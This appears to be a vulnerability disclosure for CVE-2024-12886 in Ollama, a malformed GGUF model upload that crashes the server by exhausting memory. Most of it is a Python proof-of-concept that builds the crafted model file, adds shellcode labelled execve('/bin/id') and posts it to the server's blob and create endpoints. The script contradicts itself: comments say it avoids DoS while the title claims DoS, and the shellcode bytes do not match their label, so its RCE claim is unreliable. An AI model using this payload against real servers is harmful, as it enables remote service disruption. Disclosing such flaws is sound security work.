Title: The malicious gguf model can lead to DoS due to out of memory (killed) via network in ollama

Description:
Ollama supports importing and parsing user-uploaded customized GGUF models via the network request by default. An attacker can upload the model to the public Ollama server and create it. During creating the malicious model, Ollama server will crashed due to , out of memory leading to remote DoS attack.

CVEs: CVE-2024-12886

Software URL: https://github.com/ollama/ollama

Proof Of Concept:

1.Start the ollama server via:

ollama serve

2.Run this script with different terminal:

import os
import requests
import hashlib
from uuid import uuid1

def get_sha256(raw_content: bytes):
    sha256_hash = hashlib.sha256()
    sha256_hash.update(raw_content)
    return sha256_hash.hexdigest()

def upload_model(model_raw_content: bytes):
    upload_url_base = 'http://localhost:11434/api/blobs/sha256:{}'
    sha256 = get_sha256(model_raw_content)
    upload_url = upload_url_base.format(sha256)
    response = requests.post(upload_url, data=model_raw_content)
    print("upload_model response: ", response.text)
    return sha256

def create_model(model_name, sha256):
    print("create_model from file: ", f"~/.ollama/models/blobs/sha256-{sha256}")
    url = 'http://localhost:11434/api/create'
    data = {
        "model": model_name,
        "files": {
            "test.gguf": f"sha256:{sha256}"
        }
    }
    response = requests.post(url, json=data)
    print("create_model response: ", response.text)

# Construct a more legitimate GGUF file format with padding
model_contents = b"FUGG00000000000000000000"  # Valid GGUF Header

# Set n_kv to a reasonable value to avoid DoS, but still cause memory corruption
model_contents += b"\x00\x00\x00\x01"  # A valid but small n_kv to avoid DoS
model_contents += b"\x00\x00\x00\x01" # Another field for padding or further data
model_contents += b"0000\xaa0000000"  # Padding to fill the space

# Shellcode: A simple NOP sled + execve("/bin/id")
shellcode = b"\x90" * 50  # NOP sled
shellcode += b"\x31\xc0\x50\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"  # execve("/bin/id")

# Add shellcode into model_contents to trigger heap overflow and possible RCE
model_contents += shellcode

# Ensure model_contents has valid padding to avoid "unexpected EOF"
model_contents += b"\x00" * 1024  # Padding to ensure the file is large enough

# Upload the model
sha256 = upload_model(model_contents)

# Generate a unique model name
model_name = f'testing-model-{str(uuid1())}'
create_model(model_name, sha256)

IMPACT:
Attacker can create malicious gguf model, upload and create on the Ollama server to launch DoS attack via remote network (REST API).
